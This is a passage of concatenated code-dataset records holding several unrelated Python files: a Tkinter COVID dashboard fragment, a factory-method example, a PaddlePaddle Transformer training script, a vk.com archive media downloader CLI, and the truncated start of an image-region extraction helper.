app_cov_frame.grid(row=0, column=0, columnspan=3, sticky=NSEW)\n\n #covid infected frame\n send_frame_infected= Frame(window, width=220, height=100, background=c2, relief=\"flat\")\n send_frame_infected.grid(row=1, column=0, sticky=NW, pady=5, padx=5)\n\n #covid retrieved frame\n send_frame_recovered= Frame(window, width=220, height=100, background=c2, relief=\"flat\")\n send_frame_recovered.grid(row=1, column=1, sticky=NW, pady=5, padx=5)\n\n #frame of dead by covid\n send_frame_deaths= Frame(window, width=220, height=100, background=c2, relief=\"flat\")\n send_frame_deaths.grid(row=1, column=2, sticky=NW, pady=5, padx=5)\n\n #red division frame\n select_frame= Frame(window, width=840, height=50, background=c6, relief=\"flat\")\n select_frame.grid(row=2, column=0, columnspan=3, sticky=N, pady=10)\n \n def labelCountry(self):\n label_country = Label(select_frame, text=\"Select Country:\", width=13, height=1, pady=7, padx=0, \n relief=\"flat\", anchor=NW, font=(\"Ivy 10 bold\"), background=c6, fg=c0)\n label_country.grid(row=0, column=0, pady=1, padx=13)\n\n country=[\"Global\", \"Brazil\", \"Portugal\", \"USA\", \"France\", \"Spain\", \n \"China\", \"Japan\", \"Switzerland\", \"Germany\", \"Italy\", \"Belgium\", \"Angola\"]\n\n sel = ttk.Combobox(select_frame, width=15, font=(\"Ivy 8 bold\"))\n sel[\"value\"]=(country)\n sel.grid(row=0, column=1, padx=0, pady=13)\n\n\nwindow = Window() \n\nsel.bind(\"<>\", selects)\nwindow.mainloop()\n\n\n \n","repo_name":"Vogel1212/covid-19-application","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"21017935535","text":"import os\n\nfrom creational.factory_method.creator import ParserCreator\nfrom creational.factory_method.concrate_creator_one import YAMLParserCreator\nfrom creational.factory_method.concrate_creator_two import JSONParserCreator\n\nFILES_PATH = './data'\n\n\ndef client_code(parser: ParserCreator, file_to_parse: str) -> None:\n \"\"\"\n The client code works with an instance of a concrete creator, albeit through\n its base interface. As long as the client keeps working with the creator via\n the base interface, you can pass it any creator's subclass.\n \"\"\"\n\n print(f\"{parser.parse(file_to_parse)}\")\n\n\nif __name__ == \"__main__\":\n files = [\n os.path.normpath(\n os.path.join(FILES_PATH, d)\n ) for d in os.listdir(os.path.abspath(FILES_PATH))\n ]\n\n for file in files:\n if file.endswith('.json'):\n print(\"App: Launched with the JSONParserCreator.\")\n client_code(JSONParserCreator(), file)\n if file.endswith('.yaml'):\n print(\"App: Launched with the YAMLParserCreator.\")\n client_code(YAMLParserCreator(), file)\n","repo_name":"OmriGilhar/design-patterns-py","sub_path":"creational/factory_method/client_side.py","file_name":"client_side.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20903935952","text":"import argparse\nimport ast\nimport copy\nimport logging\nimport multiprocessing\nimport os\nimport six\nimport sys\nimport time\n\nimport numpy as np\nimport paddle.fluid as fluid\n\nimport reader\nfrom config import *\nfrom desc import *\nfrom model import transformer, position_encoding_init\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Training for Transformer.\")\n parser.add_argument(\n \"--src_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of source language.\")\n parser.add_argument(\n \"--trg_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of target language.\")\n parser.add_argument(\n \"--phoneme_vocab_fpath\",\n type=str,\n required=True,\n help=\"The path of vocabulary file of phonemes.\")\n parser.add_argument(\n \"--lexicon_fpath\",\n type=str,\n required=True,\n help=\"The path of lexicon of source language.\")\n parser.add_argument(\n \"--train_file_pattern\",\n type=str,\n required=True,\n help=\"The pattern to match training data files.\")\n parser.add_argument(\n \"--val_file_pattern\",\n type=str,\n help=\"The pattern to match validation data files.\")\n parser.add_argument(\n \"--use_token_batch\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to \"\n \"produce batch data according to token number.\")\n parser.add_argument(\n \"--batch_size\",\n type=int,\n default=4096,\n help=\"The number of sequences contained in a mini-batch, or the maximum \"\n \"number of tokens (include paddings) contained in a mini-batch. Note \"\n \"that this represents the number on single device and the actual batch \"\n \"size for multi-devices will multiply the device number.\")\n parser.add_argument(\n \"--pool_size\",\n type=int,\n default=200000,\n help=\"The buffer size to pool data.\")\n parser.add_argument(\n \"--sort_type\",\n default=\"pool\",\n choices=(\"global\", \"pool\", \"none\"),\n help=\"The grain to sort by length: global for all instances; pool for \"\n \"instances in pool; none for no sort.\")\n parser.add_argument(\n \"--shuffle\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to shuffle instances in each pass.\")\n parser.add_argument(\n \"--shuffle_batch\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to shuffle the data batches.\")\n parser.add_argument(\n \"--special_token\",\n type=str,\n default=[\"\", \"\", \"\"],\n nargs=3,\n help=\"The , and tokens in the dictionary.\")\n parser.add_argument(\n \"--token_delimiter\",\n type=lambda x: str(x.encode().decode(\"unicode-escape\")),\n default=\" \",\n help=\"The delimiter used to split tokens in source or target sentences. \"\n \"For EN-DE BPE data we provided, use spaces as token delimiter. \")\n parser.add_argument(\n 'opts',\n help='See config.py for all options',\n default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument(\n '--local',\n type=ast.literal_eval,\n default=True,\n help='Whether to run as local mode.')\n parser.add_argument(\n '--device',\n type=str,\n default='GPU',\n choices=['CPU', 'GPU'],\n help=\"The device type.\")\n parser.add_argument(\n '--update_method',\n choices=(\"pserver\", \"nccl2\"),\n default=\"pserver\",\n help='Update method.')\n parser.add_argument(\n '--sync', type=ast.literal_eval, default=True, help=\"sync mode.\")\n parser.add_argument(\n \"--enable_ce\",\n type=ast.literal_eval,\n default=False,\n help=\"The flag indicating whether to run the task \"\n \"for continuous evaluation.\")\n parser.add_argument(\n \"--use_py_reader\",\n type=ast.literal_eval,\n default=True,\n help=\"The flag indicating whether to use py_reader.\")\n parser.add_argument(\n \"--fetch_steps\",\n type=int,\n default=100,\n help=\"The frequency to fetch and print output.\")\n\n args = parser.parse_args()\n # Append args related to dict\n src_dict = reader.DataReader.load_dict(args.src_vocab_fpath)\n trg_dict = reader.DataReader.load_dict(args.trg_vocab_fpath)\n phone_dict = reader.DataReader.load_dict(args.phoneme_vocab_fpath)\n dict_args = [\n \"src_vocab_size\", str(len(src_dict)), \"trg_vocab_size\",\n str(len(trg_dict)), \"phone_vocab_size\", str(len(phone_dict)), \"bos_idx\",\n str(src_dict[args.special_token[0]]), \"eos_idx\",\n str(src_dict[args.special_token[1]]), \"unk_idx\",\n str(src_dict[args.special_token[2]])\n ]\n merge_cfg_from_list(args.opts + dict_args,\n [TrainTaskConfig, ModelHyperParams])\n\n return args\n\n\ndef append_nccl2_prepare(startup_prog, trainer_id, worker_endpoints,\n current_endpoint):\n assert (trainer_id >= 0 and len(worker_endpoints) > 1 and\n current_endpoint in worker_endpoints)\n eps = copy.deepcopy(worker_endpoints)\n eps.remove(current_endpoint)\n nccl_id_var = startup_prog.global_block().create_var(\n name=\"NCCLID\", persistable=True, type=fluid.core.VarDesc.VarType.RAW)\n startup_prog.global_block().append_op(\n type=\"gen_nccl_id\",\n inputs={},\n outputs={\"NCCLID\": nccl_id_var},\n attrs={\n \"endpoint\": current_endpoint,\n \"endpoint_list\": eps,\n \"trainer_id\": trainer_id\n })\n return nccl_id_var\n\n\ndef pad_phoneme_data(phoneme_seqs, pad_idx, max_seq_len):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n ph_seq_lens = []\n for ps in phoneme_seqs:\n cur_seq_lens = [len(x) for x in ps]\n ph_seq_lens.append(max(cur_seq_lens))\n max_ph_seq_len = max(ph_seq_lens)\n\n batch_size = len(phoneme_seqs)\n phoneme_data = pad_idx * np.ones(\n (batch_size, max_seq_len, max_ph_seq_len), dtype=np.int64)\n phoneme_mask = np.zeros(\n (batch_size, max_seq_len, max_ph_seq_len), dtype=np.int64)\n\n for i in range(batch_size):\n cur_ph_seq = phoneme_seqs[i]\n for j, cur_word_phs in enumerate(cur_ph_seq):\n word_phs_len = len(cur_word_phs)\n phoneme_data[i, j, :word_phs_len] = cur_word_phs\n phoneme_mask[i, j, :word_phs_len] = 1\n\n phoneme_data = np.reshape(phoneme_data, [batch_size, max_seq_len, -1, 1])\n\n return phoneme_data, phoneme_mask, max_ph_seq_len\n\n\ndef pad_batch_data(insts,\n pad_idx,\n n_head,\n is_target=False,\n is_label=False,\n return_attn_bias=True,\n return_max_len=True,\n return_num_token=False):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n max_len = max(len(inst) for inst in insts)\n # Any token included in dict can be used to pad, since the paddings' loss\n # will be masked out by weights and make no effect on parameter gradients.\n inst_data = np.array(\n [inst + [pad_idx] * (max_len - len(inst)) for inst in insts])\n return_list += [inst_data.astype(\"int64\").reshape([-1, 1])]\n if is_label: # label weight\n inst_weight = np.array([[1.] * len(inst) + [0.] * (max_len - len(inst))\n for inst in insts])\n return_list += [inst_weight.astype(\"float32\").reshape([-1, 1])]\n else: # position data\n inst_pos = np.array([\n list(range(0, len(inst))) + [0] * (max_len - len(inst))\n for inst in insts\n ])\n return_list += [inst_pos.astype(\"int64\").reshape([-1, 1])]\n if return_attn_bias:\n if is_target:\n # This is used to avoid attention on paddings and subsequent\n # words.\n slf_attn_bias_data = np.ones((inst_data.shape[0], max_len, max_len))\n slf_attn_bias_data = np.triu(slf_attn_bias_data,\n 1).reshape([-1, 1, max_len, max_len])\n slf_attn_bias_data = np.tile(slf_attn_bias_data,\n [1, n_head, 1, 1]) * [-1e9]\n else:\n # This is used to avoid attention on paddings.\n slf_attn_bias_data = np.array([[0] * len(inst) + [-1e9] *\n (max_len - len(inst))\n for inst in insts])\n slf_attn_bias_data = np.tile(\n slf_attn_bias_data.reshape([-1, 1, 1, max_len]),\n [1, n_head, max_len, 1])\n return_list += [slf_attn_bias_data.astype(\"float32\")]\n if return_max_len:\n return_list += [max_len]\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n return return_list if len(return_list) > 1 else return_list[0]\n\n\ndef prepare_batch_input(insts, data_input_names, src_pad_idx, phone_pad_idx,\n trg_pad_idx, n_head, d_model):\n \"\"\"\n Put all padded data needed by training into a dict.\n \"\"\"\n src_word, src_pos, src_slf_attn_bias, src_max_len = pad_batch_data(\n [inst[0] for inst in insts], src_pad_idx, n_head, is_target=False)\n src_word = src_word.reshape(-1, src_max_len, 1)\n src_pos = src_pos.reshape(-1, src_max_len, 1)\n src_phone, src_phone_mask, max_phone_len = pad_phoneme_data(\n [inst[1] for inst in insts], phone_pad_idx, src_max_len)\n trg_word, trg_pos, trg_slf_attn_bias, trg_max_len = pad_batch_data(\n [inst[2] for inst in insts], trg_pad_idx, n_head, is_target=True)\n trg_word = trg_word.reshape(-1, trg_max_len, 1)\n trg_pos = trg_pos.reshape(-1, trg_max_len, 1)\n\n trg_src_attn_bias = np.tile(src_slf_attn_bias[:, :, ::src_max_len, :],\n [1, 1, trg_max_len, 1]).astype(\"float32\")\n\n lbl_word, lbl_weight, num_token = pad_batch_data(\n [inst[3] for inst in insts],\n trg_pad_idx,\n n_head,\n is_target=False,\n is_label=True,\n return_attn_bias=False,\n return_max_len=False,\n return_num_token=True)\n\n data_input_dict = dict(\n zip(data_input_names, [\n src_word, src_pos, src_slf_attn_bias, src_phone, src_phone_mask,\n trg_word, trg_pos, trg_slf_attn_bias, trg_src_attn_bias, lbl_word,\n lbl_weight\n ]))\n\n return data_input_dict, np.asarray([num_token], dtype=\"float32\")\n\n\ndef prepare_data_generator(args,\n is_test,\n count,\n pyreader,\n py_reader_provider_wrapper,\n place=None):\n \"\"\"\n Data generator wrapper for DataReader. If use py_reader, set the data\n provider for py_reader\n \"\"\"\n data_reader = reader.DataReader(\n phoneme_vocab_fpath=args.phoneme_vocab_fpath,\n lexicon_fpath=args.lexicon_fpath,\n fpattern=args.val_file_pattern if is_test else args.train_file_pattern,\n src_vocab_fpath=args.src_vocab_fpath,\n trg_vocab_fpath=args.trg_vocab_fpath,\n token_delimiter=args.token_delimiter,\n use_token_batch=args.use_token_batch,\n batch_size=args.batch_size * (1 if args.use_token_batch else count),\n pool_size=args.pool_size,\n sort_type=args.sort_type,\n shuffle=args.shuffle,\n shuffle_batch=args.shuffle_batch,\n start_mark=args.special_token[0],\n end_mark=args.special_token[1],\n unk_mark=args.special_token[2],\n # count start and end tokens out\n max_length=ModelHyperParams.max_length - 2,\n clip_last_batch=False).batch_generator\n\n def stack(data_reader, count, clip_last=True):\n def __impl__():\n res = []\n for item in data_reader():\n res.append(item)\n if len(res) == count:\n yield res\n res = []\n if len(res) == count:\n yield res\n elif not clip_last:\n data = []\n for item in res:\n data += item\n if len(data) > count:\n inst_num_per_part = len(data) // count\n yield [\n data[inst_num_per_part * i:inst_num_per_part * (i + 1)]\n for i in range(count)\n ]\n\n return __impl__\n\n def split(data_reader, count):\n def __impl__():\n for item in data_reader():\n inst_num_per_part = len(item) // count\n for i in range(count):\n yield item[inst_num_per_part * i:inst_num_per_part * (i + 1\n )]\n\n return __impl__\n\n if not args.use_token_batch:\n # to make data on each device have similar token number\n data_reader = split(data_reader, count)\n if args.use_py_reader:\n pyreader.decorate_tensor_provider(\n py_reader_provider_wrapper(data_reader, place))\n data_reader = None\n else: # Data generator for multi-devices\n data_reader = stack(data_reader, count)\n return data_reader\n\n\ndef prepare_feed_dict_list(data_generator, init_flag, count):\n \"\"\"\n Prepare the list of feed dict for multi-devices.\n \"\"\"\n feed_dict_list = []\n if data_generator is not None: # use_py_reader == False\n data_input_names = encoder_data_input_fields + \\\n decoder_data_input_fields[:-1] + label_data_input_fields\n data = next(data_generator)\n for idx, data_buffer in enumerate(data):\n data_input_dict, num_token = prepare_batch_input(\n data_buffer, data_input_names, ModelHyperParams.eos_idx,\n ModelHyperParams.phone_pad_idx, ModelHyperParams.eos_idx,\n ModelHyperParams.n_head, ModelHyperParams.d_model)\n feed_dict_list.append(data_input_dict)\n if init_flag:\n for idx in range(count):\n pos_enc_tables = dict()\n for pos_enc_param_name in pos_enc_param_names:\n pos_enc_tables[pos_enc_param_name] = position_encoding_init(\n ModelHyperParams.max_length + 1, ModelHyperParams.d_model)\n if len(feed_dict_list) <= idx:\n feed_dict_list.append(pos_enc_tables)\n else:\n feed_dict_list[idx] = dict(\n list(pos_enc_tables.items()) + list(feed_dict_list[idx]\n .items()))\n return feed_dict_list if len(feed_dict_list) == count else None\n\n\ndef py_reader_provider_wrapper(data_reader, place):\n \"\"\"\n Data provider needed by fluid.layers.py_reader.\n \"\"\"\n\n def py_reader_provider():\n data_input_names = encoder_data_input_fields + \\\n decoder_data_input_fields[:-1] + label_data_input_fields\n for batch_id, data in enumerate(data_reader()):\n data_input_dict, num_token = prepare_batch_input(\n data, data_input_names, ModelHyperParams.eos_idx,\n ModelHyperParams.phone_pad_idx, ModelHyperParams.eos_idx,\n ModelHyperParams.n_head, ModelHyperParams.d_model)\n yield [data_input_dict[item] for item in data_input_names]\n\n return py_reader_provider\n\n\ndef test_context(exe, train_exe, dev_count):\n # Context to do validation.\n test_prog = fluid.Program()\n startup_prog = fluid.Program()\n if args.enable_ce:\n test_prog.random_seed = 1000\n startup_prog.random_seed = 1000\n with fluid.program_guard(test_prog, startup_prog):\n with fluid.unique_name.guard():\n sum_cost, avg_cost, predict, token_num, pyreader = transformer(\n ModelHyperParams.src_vocab_size,\n ModelHyperParams.trg_vocab_size,\n ModelHyperParams.max_length + 1,\n ModelHyperParams.n_layer,\n ModelHyperParams.n_head,\n ModelHyperParams.d_key,\n ModelHyperParams.d_value,\n ModelHyperParams.d_model,\n ModelHyperParams.d_inner_hid,\n ModelHyperParams.prepostprocess_dropout,\n ModelHyperParams.attention_dropout,\n ModelHyperParams.relu_dropout,\n ModelHyperParams.preprocess_cmd,\n ModelHyperParams.postprocess_cmd,\n ModelHyperParams.weight_sharing,\n TrainTaskConfig.label_smooth_eps,\n use_py_reader=args.use_py_reader,\n beta=ModelHyperParams.beta,\n is_test=True)\n test_prog = test_prog.clone(for_test=True)\n test_data = prepare_data_generator(\n args,\n is_test=True,\n count=dev_count,\n pyreader=pyreader,\n py_reader_provider_wrapper=py_reader_provider_wrapper)\n\n exe.run(startup_prog) # to init pyreader for testing\n if TrainTaskConfig.ckpt_path:\n fluid.io.load_persistables(\n exe, TrainTaskConfig.ckpt_path, main_program=test_prog)\n\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.use_experimental_executor = True\n build_strategy = fluid.BuildStrategy()\n test_exe = fluid.ParallelExecutor(\n use_cuda=TrainTaskConfig.use_gpu,\n main_program=test_prog,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy,\n share_vars_from=train_exe)\n\n def test(exe=test_exe, pyreader=pyreader):\n test_total_cost = 0\n test_total_token = 0\n\n if args.use_py_reader:\n pyreader.start()\n data_generator = None\n else:\n data_generator = test_data()\n while True:\n try:\n feed_dict_list = prepare_feed_dict_list(data_generator, False,\n dev_count)\n outs = test_exe.run(fetch_list=[sum_cost.name, token_num.name],\n feed=feed_dict_list)\n except (StopIteration, fluid.core.EOFException):\n # The current pass is over.\n if args.use_py_reader:\n pyreader.reset()\n break\n sum_cost_val, token_num_val = np.array(outs[0]), np.array(outs[1])\n test_total_cost += sum_cost_val.sum()\n test_total_token += token_num_val.sum()\n test_avg_cost = test_total_cost / test_total_token\n test_ppl = np.exp([min(test_avg_cost, 100)])\n return test_avg_cost, test_ppl\n\n return test\n\n\ndef train_loop(exe,\n train_prog,\n startup_prog,\n dev_count,\n sum_cost,\n avg_cost,\n token_num,\n predict,\n pyreader,\n nccl2_num_trainers=1,\n nccl2_trainer_id=0):\n # Initialize the parameters.\n if TrainTaskConfig.ckpt_path:\n exe.run(startup_prog) # to init pyreader for training\n logging.info(\"load checkpoint from {}\".format(\n TrainTaskConfig.ckpt_path))\n fluid.io.load_persistables(\n exe, TrainTaskConfig.ckpt_path, main_program=train_prog)\n else:\n logging.info(\"init fluid.framework.default_startup_program\")\n exe.run(startup_prog)\n\n logging.info(\"begin reader\")\n train_data = prepare_data_generator(\n args,\n is_test=False,\n count=dev_count,\n pyreader=pyreader,\n py_reader_provider_wrapper=py_reader_provider_wrapper)\n\n # For faster executor\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.use_experimental_executor = True\n exec_strategy.num_iteration_per_drop_scope = int(args.fetch_steps)\n build_strategy = fluid.BuildStrategy()\n # Since the token number differs among devices, customize gradient scale to\n # use token average cost among multi-devices. and the gradient scale is\n # `1 / token_number` for average cost.\n # build_strategy.gradient_scale_strategy = fluid.BuildStrategy.GradientScaleStrategy.Customized\n\n logging.info(\"begin executor\")\n train_exe = fluid.ParallelExecutor(\n use_cuda=TrainTaskConfig.use_gpu,\n loss_name=avg_cost.name,\n main_program=train_prog,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy,\n num_trainers=nccl2_num_trainers,\n trainer_id=nccl2_trainer_id)\n\n if args.val_file_pattern is not None:\n test = test_context(exe, train_exe, dev_count)\n\n # the best cross-entropy value with label smoothing\n loss_normalizer = -((1. - TrainTaskConfig.label_smooth_eps) * np.log(\n (1. - TrainTaskConfig.label_smooth_eps\n )) + TrainTaskConfig.label_smooth_eps *\n np.log(TrainTaskConfig.label_smooth_eps / (\n ModelHyperParams.trg_vocab_size - 1) + 1e-20))\n\n step_idx = 0\n init_flag = True\n\n logging.info(\"begin train\")\n for pass_id in six.moves.xrange(TrainTaskConfig.pass_num):\n pass_start_time = time.time()\n\n if args.use_py_reader:\n pyreader.start()\n data_generator = None\n else:\n data_generator = train_data()\n\n batch_id = 0\n while True:\n try:\n feed_dict_list = prepare_feed_dict_list(data_generator,\n init_flag, dev_count)\n outs = train_exe.run(\n fetch_list=[sum_cost.name, token_num.name]\n if step_idx % args.fetch_steps == 0 else [],\n feed=feed_dict_list)\n\n if step_idx % args.fetch_steps == 0:\n sum_cost_val, token_num_val = np.array(outs[0]), np.array(\n outs[1])\n # sum the cost from multi-devices\n total_sum_cost = sum_cost_val.sum()\n total_token_num = token_num_val.sum()\n total_avg_cost = total_sum_cost / total_token_num\n\n if step_idx == 0:\n logging.info(\n \"step_idx: %d, epoch: %d, batch: %d, avg loss: %f, \"\n \"normalized loss: %f, ppl: %f\" %\n (step_idx, pass_id, batch_id, total_avg_cost,\n total_avg_cost - loss_normalizer,\n np.exp([min(total_avg_cost, 100)])))\n avg_batch_time = time.time()\n else:\n logging.info(\n \"step_idx: %d, epoch: %d, batch: %d, avg loss: %f, \"\n \"normalized loss: %f, ppl: %f, speed: %.2f step/s\" %\n (step_idx, pass_id, batch_id, total_avg_cost,\n total_avg_cost - loss_normalizer, np.exp(\n [min(total_avg_cost, 100)]),\n args.fetch_steps / (time.time() - avg_batch_time)))\n avg_batch_time = time.time()\n\n if step_idx % TrainTaskConfig.save_freq == 0 and step_idx > 0:\n fluid.io.save_persistables(\n exe,\n os.path.join(TrainTaskConfig.ckpt_dir,\n \"latest.checkpoint\"), train_prog)\n fluid.io.save_params(\n exe,\n os.path.join(TrainTaskConfig.model_dir,\n \"iter_\" + str(step_idx) + \".infer.model\"),\n train_prog)\n\n init_flag = False\n batch_id += 1\n step_idx += 1\n except (StopIteration, fluid.core.EOFException):\n # The current pass is over.\n if args.use_py_reader:\n pyreader.reset()\n break\n\n time_consumed = time.time() - pass_start_time\n # Validate and save the persistable.\n if args.val_file_pattern is not None:\n val_avg_cost, val_ppl = test()\n logging.info(\n \"epoch: %d, val avg loss: %f, val normalized loss: %f, val ppl: %f,\"\n \" consumed %fs\" % (pass_id, val_avg_cost,\n val_avg_cost - loss_normalizer, val_ppl,\n time_consumed))\n else:\n logging.info(\"epoch: %d, consumed %fs\" % (pass_id, time_consumed))\n if not args.enable_ce:\n fluid.io.save_persistables(\n exe,\n os.path.join(TrainTaskConfig.ckpt_dir,\n \"pass_\" + str(pass_id) + \".checkpoint\"),\n train_prog)\n\n if args.enable_ce: # For CE\n print(\"kpis\\ttrain_cost_card%d\\t%f\" % (dev_count, total_avg_cost))\n if args.val_file_pattern is not None:\n print(\"kpis\\ttest_cost_card%d\\t%f\" % (dev_count, val_avg_cost))\n print(\"kpis\\ttrain_duration_card%d\\t%f\" % (dev_count, time_consumed))\n\n\ndef train(args):\n # priority: ENV > args > config\n is_local = os.getenv(\"PADDLE_IS_LOCAL\", \"1\")\n if is_local == '0':\n args.local = False\n logging.info(args)\n\n if args.device == 'CPU':\n TrainTaskConfig.use_gpu = False\n\n training_role = os.getenv(\"TRAINING_ROLE\", \"TRAINER\")\n\n if training_role == \"PSERVER\" or (not TrainTaskConfig.use_gpu):\n place = fluid.CPUPlace()\n dev_count = int(os.environ.get('CPU_NUM', multiprocessing.cpu_count()))\n else:\n place = fluid.CUDAPlace(0)\n dev_count = fluid.core.get_cuda_device_count()\n\n exe = fluid.Executor(place)\n\n train_prog = fluid.Program()\n startup_prog = fluid.Program()\n\n if args.enable_ce:\n train_prog.random_seed = 1000\n startup_prog.random_seed = 1000\n\n with fluid.program_guard(train_prog, startup_prog):\n with fluid.unique_name.guard():\n sum_cost, avg_cost, predict, token_num, pyreader = transformer(\n ModelHyperParams.src_vocab_size,\n ModelHyperParams.trg_vocab_size,\n ModelHyperParams.phone_vocab_size,\n ModelHyperParams.max_length + 1,\n ModelHyperParams.n_layer,\n ModelHyperParams.n_head,\n ModelHyperParams.d_key,\n ModelHyperParams.d_value,\n ModelHyperParams.d_model,\n ModelHyperParams.d_inner_hid,\n ModelHyperParams.prepostprocess_dropout,\n ModelHyperParams.attention_dropout,\n ModelHyperParams.relu_dropout,\n ModelHyperParams.preprocess_cmd,\n ModelHyperParams.postprocess_cmd,\n ModelHyperParams.weight_sharing,\n TrainTaskConfig.label_smooth_eps,\n ModelHyperParams.beta,\n ModelHyperParams.bos_idx,\n use_py_reader=args.use_py_reader,\n is_test=False)\n\n optimizer = None\n if args.sync:\n lr_decay = fluid.layers.learning_rate_scheduler.noam_decay(\n ModelHyperParams.d_model, TrainTaskConfig.warmup_steps)\n logging.info(\"before adam\")\n\n with fluid.default_main_program()._lr_schedule_guard():\n learning_rate = lr_decay * TrainTaskConfig.learning_rate\n\n optimizer = fluid.optimizer.Adam(\n learning_rate=learning_rate,\n beta1=TrainTaskConfig.beta1,\n beta2=TrainTaskConfig.beta2,\n epsilon=TrainTaskConfig.eps)\n else:\n optimizer = fluid.optimizer.SGD(0.003)\n optimizer.minimize(avg_cost)\n\n if args.local:\n logging.info(\"local start_up:\")\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost, avg_cost,\n token_num, predict, pyreader)\n else:\n if args.update_method == \"nccl2\":\n trainer_id = int(os.getenv(\"PADDLE_TRAINER_ID\", \"0\"))\n port = os.getenv(\"PADDLE_PORT\")\n worker_ips = os.getenv(\"PADDLE_TRAINERS\")\n worker_endpoints = []\n for ip in worker_ips.split(\",\"):\n worker_endpoints.append(':'.join([ip, port]))\n trainers_num = len(worker_endpoints)\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + port\n if trainer_id == 0:\n logging.info(\"train_id == 0, sleep 60s\")\n time.sleep(60)\n logging.info(\"trainers_num:{}\".format(trainers_num))\n logging.info(\"worker_endpoints:{}\".format(worker_endpoints))\n logging.info(\"current_endpoint:{}\".format(current_endpoint))\n append_nccl2_prepare(startup_prog, trainer_id, worker_endpoints,\n current_endpoint)\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost,\n avg_cost, token_num, predict, pyreader, trainers_num,\n trainer_id)\n return\n\n port = os.getenv(\"PADDLE_PORT\", \"6174\")\n pserver_ips = os.getenv(\"PADDLE_PSERVERS\") # ip,ip...\n eplist = []\n for ip in pserver_ips.split(\",\"):\n eplist.append(':'.join([ip, port]))\n pserver_endpoints = \",\".join(eplist) # ip:port,ip:port...\n trainers = int(os.getenv(\"PADDLE_TRAINERS_NUM\", \"0\"))\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + port\n trainer_id = int(os.getenv(\"PADDLE_TRAINER_ID\"))\n\n logging.info(\"pserver_endpoints:{}\".format(pserver_endpoints))\n logging.info(\"current_endpoint:{}\".format(current_endpoint))\n logging.info(\"trainer_id:{}\".format(trainer_id))\n logging.info(\"pserver_ips:{}\".format(pserver_ips))\n logging.info(\"port:{}\".format(port))\n\n t = fluid.DistributeTranspiler()\n t.transpile(\n trainer_id,\n pservers=pserver_endpoints,\n trainers=trainers,\n program=train_prog,\n startup_program=startup_prog)\n\n if training_role == \"PSERVER\":\n logging.info(\"distributed: pserver started\")\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + os.getenv(\n \"PADDLE_PORT\")\n if not current_endpoint:\n logging.critical(\"need env SERVER_ENDPOINT\")\n exit(1)\n pserver_prog = t.get_pserver_program(current_endpoint)\n pserver_startup = t.get_startup_program(current_endpoint,\n pserver_prog)\n\n exe.run(pserver_startup)\n exe.run(pserver_prog)\n elif training_role == \"TRAINER\":\n logging.info(\"distributed: trainer started\")\n trainer_prog = t.get_trainer_program()\n\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost,\n avg_cost, token_num, predict, pyreader)\n else:\n logging.critical(\n \"environment var TRAINER_ROLE should be TRAINER os PSERVER\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n LOG_FORMAT = \"[%(asctime)s %(levelname)s %(filename)s:%(lineno)d] %(message)s\"\n logging.basicConfig(\n stream=sys.stdout, level=logging.DEBUG, format=LOG_FORMAT)\n logging.getLogger().setLevel(logging.INFO)\n\n args = parse_args()\n train(args)\n","repo_name":"PaddlePaddle/Research","sub_path":"NLP/ACL2019-JEMT/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":31844,"program_lang":"python","lang":"en","doc_type":"code","stars":1671,"dataset":"github-code","pt":"90"} +{"seq_id":"12789491692","text":"import argparse\nimport logging\nimport progressbar\nfrom extractor import supported_sources\n\nKNOWN_ENCODINGS = 'windows-1251 utf-8'.split()\n\ndef parse_cmdline():\n parser = argparse.ArgumentParser(description='Download media refenced in vk.com data archive')\n parser.add_argument('archive_dir', type=str, help='Unpacked archive directory')\n parser.add_argument('--encoding', default='windows-1251', choices=KNOWN_ENCODINGS,\n help='Encoding of files in archive (default: windows-1251)')\n source_subparsers = parser.add_subparsers(help='Archive section')\n \n for source in supported_sources.values():\n source_parser = source_subparsers.add_parser(source.title)\n source.init_parser(source_parser)\n\n return parser.parse_args()\n\ndef main(cmdline):\n progressbar.streams.wrap_stderr()\n logging.basicConfig(level=logging.INFO)\n source = supported_sources[cmdline.source]\n source.call(cmdline)\n\nif __name__ == '__main__':\n main(parse_cmdline())\n","repo_name":"bcskda/vk-archive-deepercopy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"43241892399","text":"import numpy as np\nfrom skimage import measure\n\n\ndef extract_regions_from_map(img_map):\n \"\"\"Extract regions from segmentation map.\"\"\"\n #thr = np.where(img_map > np.mean(img_map), 0., 1.0) # threshold detected regions\n thr = np.where(img_map > 0.6*np.max(img_map), 1.0, 0.) # threshold detected regions\n #plt.imshow(img_map)\n #plt.imshow(thr)\n label_image = measure.label(thr) # label them\n labels = label_image.astype(int)\n regions = measure.regionprops(labels)\n return regions\n\n\ndef extract_features_from_map(slices_img_map):\n nslices = slices_img_map.shape[0]\n \n totalArea = 0.\n avgArea = 0.\n maxArea = 